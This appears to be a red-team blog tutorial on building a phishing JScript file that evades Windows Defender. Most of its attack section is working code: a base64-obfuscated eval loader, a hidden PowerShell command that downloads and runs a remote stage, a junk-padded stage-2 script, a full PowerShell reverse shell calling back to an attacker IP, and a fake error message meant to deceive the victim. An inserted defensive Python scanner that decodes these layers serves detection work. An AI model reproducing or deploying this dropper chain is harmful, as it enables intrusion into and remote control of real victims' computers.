Weaponize JScript to bypass Windows Defender

To gain initial access during a Red Team engagement, phishing can be a valid option. It is used to deliver a payload to the target, for example a payload that connects back to the Red Team (a reverse shell). To execute the payload on the target, some tool has to launch it.

One of the many tools that can be used for weaponization is JScript, a scripting language created by Microsoft. By default it can be run on any Windows 10 machine: if a user double-clicks a .js file, it is run with WScript.exe.

In this article I will show you how to create a malicious JScript file that gets a reverse shell on a fully patched Windows 10 machine with Windows Defender enabled. This article was inspired by Daniel Lowrie’s video Create Custom FILELESS MALWARE on FULLY PATCHED WINDOWS 10, as well as by some real-world malware which I have analyzed.

Please only use this method in an authorized engagement, e.g. in your Lab, Red Team Operations, Penetration Test. Please do not use this to harm others or do something illegal!

Creating the malicious JScript file

I have named the JScript file “CV.js”. In a Red Team engagement this file might be sent to a recruiter via a phishing email.

I have put the following contents to the file:

function decode(input_value) {
    // Use MSXML's "bin.Base64" data type to turn the base64 string into bytes
    var xmlDom = new ActiveXObject("Microsoft.XMLDOM");
    var el = xmlDom.createElement("tmp");
    el.dataType = "bin.Base64";
    el.text = input_value;
    // Write the bytes into an ADODB.Stream and read them back as UTF-8 text
    var strm = WScript.CreateObject("ADODB.Stream");
    strm.Type = 1;          // adTypeBinary
    strm.Open();
    strm.Write(el.nodeTypedValue);
    strm.Position = 0;
    strm.Type = 2;          // adTypeText
    strm.CharSet = "utf-8";
    var str_to_return = strm.ReadText();
    strm.Close();
    return str_to_return;
}
eval(decode("dmFyIHggPSBkZWNvZGUoImNHOTNaVkp6U0dWc1RDQXRkMmx1Wkc5M2MzUjViR1VnYUdsa1pHVnVJQzF1VDNBZ0xXTWdJbWxGZUNoT1pYY3RUMkpxWldOMElFNWxkQzVYUldKamJFbGxiblFwTGtSdlYyNU1UMkZrYzNSU2FXNUhLQ2RvZEhSd09pOHZNVEF1TUM0eUxqRTFPalEwTXk5WGFXNVRaV04xY21sMGVWVndaR0YwWlNjcElpQT0iKTtuZXcgQWN0aXZlWE9iamVjdChkZWNvZGUoIlYxTmpjbWx3ZEM1VGFHVnNiQT09IikpLlJ1bih4KTtXU2NyaXB0LkVjaG8oIkVycm9yOiBDb3VsZCBub3Qgb3BlbiBDViEiKQ=="))

CV.js consists of the function “decode” and an “eval” call. The decode function takes a base64-encoded string and decodes it; it was posted as an answer to this Stack Overflow question.

The eval call executes the JScript code after it has been decoded from base64. If you want to bypass AV, you should heavily obfuscate your payloads. That is why I added this step: so the real payload does not get detected through static analysis.

If we decode the base64-encoded string, we get the following JScript code:

var x = decode("cG93ZVJzSGVsTCAtd2luZG93c3R5bGUgaGlkZGVuIC1uT3AgLWMgImlFeChOZXctT2JqZWN0IE5ldC5XRWJjbEllbnQpLkRvV25MT2Fkc3RSaW5HKCdodHRwOi8vMTAuMC4yLjE1OjQ0My9XaW5TZWN1cml0eVVwZGF0ZScpIiA=");new ActiveXObject(decode("V1NjcmlwdC5TaGVsbA==")).Run(x);WScript.Echo("Error: Could not open CV!")

The following representation is much more readable:

var x = decode("cG93ZVJzSGVsTCAtd2luZG93c3R5bGUgaGlkZGVuIC1uT3AgLWMgImlFeChOZXctT2JqZWN0IE5ldC5XRWJjbEllbnQpLkRvV25MT2Fkc3RSaW5HKCdodHRwOi8vMTAuMC4yLjE1OjQ0My9XaW5TZWN1cml0eVVwZGF0ZScpIiA=");
new ActiveXObject(decode("V1NjcmlwdC5TaGVsbA==")).Run(x);
WScript.Echo("Error: Could not open CV!")

First, another base64-encoded string is decoded and saved in the variable “x”. After decoding we get the actual payload: a PowerShell command that downloads another file from the attacker and runs it.

poweRsHelL -windowstyle hidden -nOp -c "iEx(New-Object Net.WEbclIent).DoWnLOadstRinG('http://10.0.2.15:443/WinSecurityUpdate')"

The line with the ActiveXObject contains “WScript.Shell” in base64. That line creates a WScript.Shell object and runs the PowerShell command on the target.

Finally, WScript.Echo shows an error message, so the targeted user thinks there was an error and does not get suspicious about the missing CV.

Stage 2

The PowerShell command which downloads “WinSecurityUpdate” triggers stage 2. The contents of stage 2 can be seen in the following code block:

$r1 = "SW5WT2tFLUVYcHJlU1NJb04gKE5ldy1PQmpFQ3QgTmVULldFYkNMaWVuVCkuRG93TmxPYURTVHJpbkcoJ2h0dHA6Ly8xMC4wLjIuMTU6NDQzL3InKQ==asdf"
$p2 = $r1.substring(0,116)
$update_r1 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($p2))
echo $update_r1 | pow""e""rsh""ell -nop -window hidden -

First of all, a variable with base64-encoded data is initialized (r1). I have added strings at the end to bypass detection that might be searching for base64 data. To remove the random data at the end, I have used the PowerShell substring function. After that the base64-encoded data is decoded. Finally the data in $update_r1 is run.

$update_r1 contains a PowerShell command to download and run a reverse shell. This is the content of $update_r1:

InVOkE-EXpreSSIoN (New-OBjECt NeT.WEbCLienT).DowNlOaDSTrinG('http://10.0.2.15:443/r')

Reverse Shell

For the reverse shell, I have used a PowerShell reverse shell from revshell:

$client = New-Object System.Net.S""ockets.TCPClie""nt('10.0.2.15',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
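Added example, not part of the original article: a small Python triage script that looks at the same three tricks from the defender's side. It undoes the "" string splitting used in stage 2 and in the reverse shell, finds every base64 run while leaving junk appended after the data (the "==asdf" trick) outside the match, and recursively decodes nested layers so the eval(decode(...)) chain in CV.js is unwrapped. The indicator list and the sample inputs are constructed here; the samples only re-encode text already shown above.

```python
import base64
import binascii
import re

# Base64 runs of 16+ chars; padding is optional, so junk glued on after the
# data (the "...==asdf" trick in stage 2) stays outside the match.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Case-insensitive indicators drawn from the three stages described above.
INDICATORS = ("eval(", "activexobject", "wscript.shell", "powershell",
              "downloadstring", "invoke-expression", "tcpclient")

def normalize(text):
    # Undo the "" string-splitting trick: pow""e""rsh""ell -> powershell
    return text.replace('""', "")

def decode_b64_prefix(token):
    # Decode the longest prefix that is valid base64 and printable ASCII, else
    # None; trying longest-first tolerates junk appended after the real data.
    body = token.rstrip("=")
    for cut in range(len(body), 15, -1):
        chunk = body[:cut]
        try:
            text = base64.b64decode(chunk + "=" * (-len(chunk) % 4), validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if text and all(c.isprintable() or c in "\r\n\t" for c in text):
            return text
    return None

def scan(text, depth=0, max_depth=4):
    # Return (depth, indicator) pairs found in text and in every base64 layer
    # nested inside it, so eval(decode(...)) chains are unwrapped.
    text = normalize(text)
    findings = [(depth, kw) for kw in INDICATORS if kw in text.lower()]
    if depth < max_depth:
        for m in B64_RUN.finditer(text):
            inner = decode_b64_prefix(m.group(0))
            if inner is not None:
                findings.extend(scan(inner, depth + 1, max_depth))
    return findings

def b64(s):
    return base64.b64encode(s.encode()).decode()

# Constructed samples that mirror the article's layering (not the original files).
PS_CMD = "poweRsHelL -windowstyle hidden -nOp -c \"iEx(New-Object Net.WEbclIent).DoWnLOadstRinG('http://10.0.2.15:443/WinSecurityUpdate')\""
STAGE1 = 'var x = decode("%s");new ActiveXObject(decode("%s")).Run(x);' % (b64(PS_CMD), b64("WScript.Shell"))
SAMPLE_JS = 'eval(decode("%s"))' % b64(STAGE1)
SAMPLE_STAGE2 = '$r1 = "%sasdf"\n$p2 = $r1.substring(0,116)\necho $update_r1 | pow""e""rsh""ell -nop -window hidden -' % b64(
    "InVOkE-EXpreSSIoN (New-OBjECt NeT.WEbCLienT).DowNlOaDSTrinG('http://10.0.2.15:443/r')")
SAMPLE_REVSHELL = "$client = New-Object System.Net.S\"\"ockets.TCPClie\"\"nt('10.0.2.15',80)"
REPORT = {n: sorted(set(scan(s))) for n, s in (("CV.js", SAMPLE_JS), ("stage2", SAMPLE_STAGE2), ("revshell", SAMPLE_REVSHELL))}
```

REPORT maps each sample to its indicators with the nesting depth at which they surfaced; for CV.js the PowerShell download command only appears at depth 2, which is exactly what a static keyword scan of the raw file misses.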

Getting the Shell

As the attacker machine I have used Kali Linux. As the victim machine I have used a fully patched Windows 10 with Microsoft Defender enabled.

Conclusion

To be able to bypass AVs, a Red Team operator should heavily obfuscate the payload. The created malware should also use multiple stages. Another trick is to encode or encrypt some of the code, especially the parts that get detected by AV.

This malware is also fileless (except for the weaponized JScript file). This type of malware is harder to detect, as it does not drop any further files to disk, which makes it an efficient way for Red Team operators to bypass AV.

Another important concept is generating code on the fly and executing it. This was implemented in the JScript file, where the code is decoded from base64 and run via “eval”.

Furthermore, Blue Teamers should not rely on AV products alone. They should keep in mind to monitor for malicious JScript files and for suspicious activity, such as the network traffic of a reverse shell or other host-based malicious activity like persistence techniques.

Passionate about Cyber Security. I am publishing CTF writeups and Cybersecurity content!
Rabbit